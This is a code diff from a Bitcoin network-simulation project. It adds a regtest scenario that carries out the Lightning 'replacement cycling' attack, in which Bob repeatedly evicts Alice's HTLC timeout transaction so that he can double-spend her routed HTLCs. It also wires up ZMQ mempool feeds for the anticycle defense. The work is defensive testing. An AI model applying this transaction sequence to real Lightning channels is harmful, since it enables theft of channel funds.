+        self.log.info(f"@{last_blockheight} {bob_parent_tx.hash[0:7]} Parent Txn "
+                      f"- Funded by: [{coin_2['txid'][0:7]} Coin_2]")
+        self.log.info(f"@{last_blockheight} {bob_parent_tx.hash[0:7]} Parent Txn - Created by: Bob")
+        self.log.info(f"@{last_blockheight} {bob_parent_tx.hash[0:7]} Parent Txn - Signed by: Bob")
+        self.log.info(f"@{last_blockheight} {bob_child_tx.hash[0:7]} Child Txn - Created by: Bob")
+
+        hashlock = hash160(b'a' * 32)
+
+        alice_timeout_height = last_blockheight + 20
+
+        (ab_commitment_tx,
+         alice_timeout_tx,
+         bob_preimage_tx) = create_chan_state(ab_funding_txid,
+                                              0,
+                                              alice_seckey,
+                                              bob_seckey,
+                                              49.99998 * COIN,
+                                              funding_redeemscript,
+                                              2,
+                                              alice_timeout_height,
+                                              hashlock,
+                                              0x1,
+                                              bob_parent_tx)
+
+        self.log.info(f"@{last_blockheight} {ab_commitment_tx.hash[0:7]} Commitment Txn "
+                      f"- Funded by: [{ab_funding_txid[0:7]} Funding Txn]")
+        self.log.info(f"@{last_blockheight} {ab_commitment_tx.hash[0:7]} Commitment Txn "
+                      f"- Signed by: Alice & Bob "
+                      "- Alice + Bob can claim with 2:2 multisig; Bob can claim with hashlock")
+        self.log.info(f"@{last_blockheight} {alice_timeout_tx.hash[0:7]} Alice Timeout Txn  "
+                      f"- Funded by: [{ab_commitment_tx.hash[0:7]} Commitment Txn]")
+        self.log.info(f"@{last_blockheight} {alice_timeout_tx.hash[0:7]} Alice Timeout Txn "
+                      f"- Signed by: Alice & Bob "
+                      f"- After nLockTime ({alice_timeout_height}), Alice can claim")
+        self.log.info(f"@{last_blockheight} {bob_preimage_tx.hash[0:7]} Bob Preimage Txn "
+                      f"- Funded by: [{ab_commitment_tx.hash[0:7]} Commitment Txn, "
+                      f"{bob_parent_tx.hash[0:7]} Parent Txn]")
+        self.log.info(f"@{last_blockheight} {bob_preimage_tx.hash[0:7]} Bob Preimage Txn "
+                      f"- Signed by: Bob "
+                      f"- Bob can claim with his preimage")
+
+        # We broadcast Alice - Bob commitment transaction.
+        ab_commitment_txid = alice.sendrawtransaction(hexstring=ab_commitment_tx.serialize().hex(),
+                                                      maxfeerate=0)
+        alice.log.info(f"@{last_blockheight} {ab_commitment_tx.hash[0:7]} Commitment Txn "
+                       "- Broadcasted by: Alice")
+
+        self.sync_all()
+
+        assert ab_commitment_txid in alice.getrawmempool()
+        assert ab_commitment_txid in bob.getrawmempool()
+        self.log.info(f"@{last_blockheight} {ab_commitment_tx.hash[0:7]} Commitment Txn - "
+                      "Seen in the mempool")
+
+        # Assuming anchor output channel, commitment transaction must be confirmed.
+        # Additionally, we mine sufficient block for the alice timeout tx to be final.
+        self.generate(alice, 20)
+        assert_equal(len(alice.getrawmempool()), 0)
+        assert_equal(len(bob.getrawmempool()), 0)
+
+        last_blockhash = alice.getbestblockhash()
+        block = alice.getblock(last_blockhash)
+        last_blockheight = block['height']
+
+        self.log.info(f"@{last_blockheight} - Mined blocks")
+
+        # Broadcast the Bob parent transaction and its child transaction
+        bob_parent_txid = bob.sendrawtransaction(hexstring=bob_parent_tx.serialize().hex(),
+                                                 maxfeerate=0)
+        bob_child_txid = bob.sendrawtransaction(hexstring=bob_child_tx.serialize().hex(),
+                                                maxfeerate=0)
+
+        self.log.info(f"@{last_blockheight} {bob_parent_txid[0:7]} Parent Txn "
+                      "- Broadcasted by: Bob")
+        self.log.info(f"@{last_blockheight} {bob_child_txid[0:7]} Child Txn "
+                      "- Broadcasted by: Bob")
+
+        self.sync_all()
+
+        assert bob_parent_txid in alice.getrawmempool()
+        assert bob_parent_txid in bob.getrawmempool()
+        assert bob_child_txid in alice.getrawmempool()
+        assert bob_child_txid in bob.getrawmempool()
+        self.log.info(f"@{last_blockheight} {bob_parent_txid[0:7]} Parent Txn "
+                      f"- Seen in the mempool")
+        self.log.info(f"@{last_blockheight} {bob_child_txid[0:7]} Child Txn - Seen in the mempool")
+
+        # Broadcast the Alice timeout transaction
+        alice_timeout_txid = alice.sendrawtransaction(hexstring=alice_timeout_tx.serialize().hex(),
+                                                      maxfeerate=0)
+        self.log.info(
+            f"@{last_blockheight} {alice_timeout_txid[0:7]} Timeout Txn "
+            f"- Broadcasted by: Alice")
+
+        self.sync_all()
+
+        assert alice_timeout_txid in alice.getrawmempool()
+        assert alice_timeout_txid in bob.getrawmempool()
+        self.log.info(f"@{last_blockheight} {alice_timeout_txid[0:7]} Alice Timeout Txn "
+                      f"- Seen in the mempool")
+
+        # Broadcast the Bob preimage transaction
+        bob_preimage_txid = bob.sendrawtransaction(hexstring=bob_preimage_tx.serialize().hex(),
+                                                   maxfeerate=0)
+        self.log.info(
+            f"@{last_blockheight} {bob_preimage_txid[0:7]} Preimage Txn - Broadcasted by: Bob "
+            f"- should kick out Alice's Timeout Txn")
+
+        self.sync_all()
+
+        assert bob_preimage_txid in alice.getrawmempool()
+        assert bob_preimage_txid in bob.getrawmempool()
+        self.log.info(
+            f"@{last_blockheight} {bob_preimage_txid[0:7]} Preimage Txn - Seen in the mempool "
+            "- this should kick out Alice's Timeout Txn")
+
+        # Check Alice timeout transaction and Bob child tx are not in the mempools anymore
+        assert alice_timeout_txid not in alice.getrawmempool()
+        assert alice_timeout_txid not in bob.getrawmempool()
+        assert bob_child_txid not in alice.getrawmempool()
+        assert bob_child_txid not in bob.getrawmempool()
+
+        self.log.info(
+            f"@{last_blockheight} {alice_timeout_txid[0:7]} Timeout Txn "
+            f"- Not seen in the mempool - Alice's Timeout Txn has been kicked out!")
+        self.log.info(f"@{last_blockheight} {bob_child_txid[0:7]} Child Txn "
+                      f"- Not seen in the mempool - Bob's Child Txn has been kicked out!")
+
+        # Generate a higher fee parent transaction and broadcast it to replace Bob preimage tx
+        (bob_replacement_parent_tx, bob_child_tx) = generate_parent_child_tx(wallet, coin_2, 10)
+
+        self.log.info(f"@{last_blockheight} {bob_replacement_parent_tx.hash[0:7]} "
+                      f"Replacement Parent Txn - Funded by: [{coin_2['txid'][0:7]} Coin_2]")
+        self.log.info(f"@{last_blockheight} {bob_replacement_parent_tx.hash[0:7]} "
+                      f"Replacement Parent Txn - Created by: Bob - Has a higher fee")
+        self.log.info(f"@{last_blockheight} {bob_replacement_parent_tx.hash[0:7]} "
+                      f"Replacement Parent Txn - Signed by: Bob")
+        self.log.info(f"@{last_blockheight} {bob_child_tx.hash[0:7]} Child Txn - Created by: Bob")
+
+        bob_replacement_parent_txid = bob.sendrawtransaction(
+            hexstring=bob_replacement_parent_tx.serialize().hex(),
+            maxfeerate=0)
+
+        self.log.info(
+            f"@{last_blockheight} {bob_replacement_parent_txid[0:7]} Replacement Parent Txn "
+            f"- Broadcasted by: Bob")
+
+        self.sync_all()
+
+        # Check Bob HTLC preimage is not in the mempools anymore
+        assert bob_preimage_txid not in alice.getrawmempool()
+        assert bob_preimage_txid not in bob.getrawmempool()
+        assert bob_replacement_parent_txid in alice.getrawmempool()
+        assert bob_replacement_parent_txid in alice.getrawmempool()
+        self.log.info(f"@{last_blockheight} Raw_mempool: {alice.getrawmempool()}")
+
+        # Check there is only 1 transaction (bob_replacement_parent_txid) in the mempools
+        assert_equal(len(alice.getrawmempool()), 1)
+        assert_equal(len(bob.getrawmempool()), 1)
+
+        self.log.info(f"@{last_blockheight} {bob_preimage_txid[0:7]} Preimage Txn "
+                      f"- Not seen in the mempool")
+        self.log.info(f"@{last_blockheight} {bob_replacement_parent_txid[0:7]} "
+                      f"Replacement Parent Txn - Seen in the mempool")
+
+        # A block is mined and bob replacement parent should have confirms.
+        self.generate(alice, 1)
+        last_blockhash = alice.getbestblockhash()
+        block = alice.getblock(last_blockhash)
+        last_blockheight = block['height']
+
+        self.sync_all()
+
+        self.log.info(f"@{last_blockheight} - Mined blocks")
+
+        assert_equal(len(alice.getrawmempool()), 0)
+        assert_equal(len(bob.getrawmempool()), 0)
+
+        self.log.info(f"@{last_blockheight} {bob_replacement_parent_txid[0:7]} "
+                      f"Replacement Parent Txn - Mined")
+
+        # Alice can re-broadcast her HTLC-timeout as the offered output has not been claimed
+        # Note the HTLC-timeout _txid_ must be modified to bypass p2p filters. Here we +1 the
+        # nSequence.
+        (_, alice_timeout_tx_2, _) = create_chan_state(ab_funding_txid, 0, alice_seckey, bob_seckey,
+                                                       49.99998 * COIN, funding_redeemscript, 2,
+                                                       alice_timeout_height, hashlock, 0x2,
+                                                       bob_parent_tx)
+
+        self.log.info(f"@{last_blockheight} {alice_timeout_tx_2.hash[0:7]} Timeout Txn 2 "
+                      f"- Created by: Alice - Alice tweaks the nsequence (and therefore txid) "
+                      f"of her original Timeout Txn, but where did she get Bob's key to do this?")
+
+        alice_timeout_txid_2 = alice.sendrawtransaction(
+            hexstring=alice_timeout_tx_2.serialize().hex(), maxfeerate=0)
+
+        self.log.info(f"@{last_blockheight} {alice_timeout_txid_2[0:7]} Timeout Txn 2 "
+                      f"- Broadcasted by: Alice")
+
+        self.sync_all()
+
+        assert alice_timeout_txid_2 in alice.getrawmempool()
+        assert alice_timeout_txid_2 in bob.getrawmempool()
+
+        # Note all the transactions are re-generated to bypass p2p filters
+        coin_3 = self.wallet.get_utxo()
+        (bob_parent_tx_2, bob_child_tx_2) = generate_parent_child_tx(wallet, coin_3, 4)
+        bob_preimage_tx_2 = generate_preimage_tx(49.9998 * COIN, 4, alice_seckey, bob_seckey,
+                                                 hashlock, ab_commitment_tx, bob_parent_tx_2)
+
+        self.log.info(f"@{last_blockheight} {bob_parent_tx_2.hash[0:7]} "
+                      f"Parent Txn 2 - Funded by: [{coin_3['txid'][0:7]} Coin_3]")
+        self.log.info(f"@{last_blockheight} {bob_parent_tx_2.hash[0:7]} Parent Txn 2 "
+                      f"- Created by: Bob")
+        self.log.info(f"@{last_blockheight} {bob_child_tx_2.hash[0:7]} Child Txn 2 "
+                      f"- Created by: Bob")
+        self.log.info(f"@{last_blockheight} {bob_preimage_tx_2.hash[0:7]} Preimage Txn 2 "
+                      f"- Created by: Bob")
+        self.log.info(f"@{last_blockheight} {bob_preimage_tx_2.hash[0:7]} Preimage Txn 2 "
+                      f"- Funded by: [{ab_commitment_txid[0:7]} Commitment Txn]")
+
+        bob_parent_txid_2 = bob.sendrawtransaction(hexstring=bob_parent_tx_2.serialize().hex(),
+                                                   maxfeerate=0)
+
+        self.log.info(f"@{last_blockheight} {bob_parent_txid_2[0:7]} Parent Txn 2 "
+                      f"- Broadcasted by: Bob")
+
+        self.sync_all()
+
+        bob_child_txid_2 = bob.sendrawtransaction(hexstring=bob_child_tx_2.serialize().hex(),
+                                                  maxfeerate=0)
+
+        self.log.info(f"@{last_blockheight} {bob_child_txid_2[0:7]} Child Txn 2 "
+                      f"- Broadcasted by: Bob")
+
+        self.sync_all()
+
+        bob_preimage_txid_2 = bob.sendrawtransaction(hexstring=bob_preimage_tx_2.serialize().hex(),
+                                                     maxfeerate=0)
+
+        self.log.info(f"@{last_blockheight} {bob_preimage_txid_2[0:7]} Preimage Txn 2 "
+                      f"- Broadcasted by Bob")
+
+        self.sync_all()
+
+        assert bob_preimage_txid_2 in alice.getrawmempool()
+        assert bob_preimage_txid_2 in bob.getrawmempool()
+        assert alice_timeout_txid_2 not in alice.getrawmempool()
+        assert alice_timeout_txid_2 not in bob.getrawmempool()
+
+        self.log.info(f"@{last_blockheight} {bob_preimage_txid_2[0:7]} Preimage Txn 2 "
+                      f"- Seen in the mempool")
+        self.log.info(f"@{last_blockheight} {alice_timeout_txid_2[0:7]} Timeout Txn 2 "
+                      f"- Not seen in the mempool")
+
+        # Bob can repeat this replacement cycling trick until an inbound HTLC of Alice expires and
+        # double-spend her routed HTLCs.
+
+        # ... but it gets mined immediately? - Greg
+        self.generate(alice, 1)
+        self.sync_all()
+
+        assert bob_preimage_txid_2 not in alice.getrawmempool()
+        assert bob_preimage_txid_2 not in bob.getrawmempool()
+
+        self.log.info(f"@{last_blockheight} Raw_mempool: {alice.getrawmempool()}")
+
+    def run_test(self):
+        address = "bcrt1p9yfmy5h72durp7zrhlw9lf7jpwjgvwdg0jr0lqmmjtgg83266lqsekaqka"    # noqa
+
+        self.generatetoaddress(self.nodes[0], nblocks=101,
+                               address=address)
+
+        self.wallet = MiniWallet(self.nodes[0])
+
+        self.test_replacement_cycling()
+
+
+if __name__ == '__main__':
+    ReplacementCyclingTest().main()

--- a/src/templates/Dockerfile
+++ b/src/templates/Dockerfile
@@ -79,7 +79,7 @@ COPY src/templates/entrypoint.sh /entrypoint.sh
 COPY src/templates/tor/torrc /etc/tor/warnet-torr
 
 VOLUME ["/home/bitcoin/.bitcoin"]
-EXPOSE 8332 8333 18332 18333 18443 18444 38333 38332
+EXPOSE 8332 8333 18332 18333 18443 18444 38333 38332 28332 28333 28334
 
 ENTRYPOINT ["/entrypoint.sh"]
 CMD ["bitcoind"]

--- a/src/warnet/tank.py
+++ b/src/warnet/tank.py
@@ -57,6 +57,7 @@ class Tank:
         self.rpc_password = "2themoon"
         self.zmqblockport = 28332
         self.zmqtxport = 28333
+        self.zmqpubsequenceport = 28334
         self._suffix = None
         self._ipv4 = None
         self._exporter_name = None
@@ -155,6 +156,7 @@ class Tank:
         conf += f" -rpcport={self.rpc_port}"
         conf += f" -zmqpubrawblock=tcp://0.0.0.0:{self.zmqblockport}"
         conf += f" -zmqpubrawtx=tcp://0.0.0.0:{self.zmqtxport}"
+        conf += f" -zmqpubsequence=tcp://0.0.0.0:{self.zmqpubsequenceport}"
         conf += " " + self.bitcoin_config
         for node in nodes:
             conf += f" -addnode={node}"

--- a/test/scenarios_test.py
+++ b/test/scenarios_test.py
@@ -14,7 +14,7 @@ base.wait_for_all_tanks_status(target="running")
 
 # Use rpc instead of warcli so we get raw JSON object
 scenarios = base.rpc("scenarios_available")
-assert len(scenarios) == 5
+assert len(scenarios) == 7
 
 # Start scenario
 base.warcli("scenarios run miner_std --allnodes --interval=1")


### PR DESCRIPTION
# Draft
Want to make a CI test for this, waiting on #384 
# Issue
Can not run any defenses against the replacement cycling attack.

# Cause
We do not have any defense scenarios implemented, and we don't have zmq connected in a way that we can monitor the attack via zmq mempool data streams.

# Solution
Bring in the instagibbs [anticycle countermeasure](https://github.com/instagibbs/anticycle), and link up zmq appropriately so we can get the correct data for running the defense

# Depends on 
#370 
#371 
#372 
#384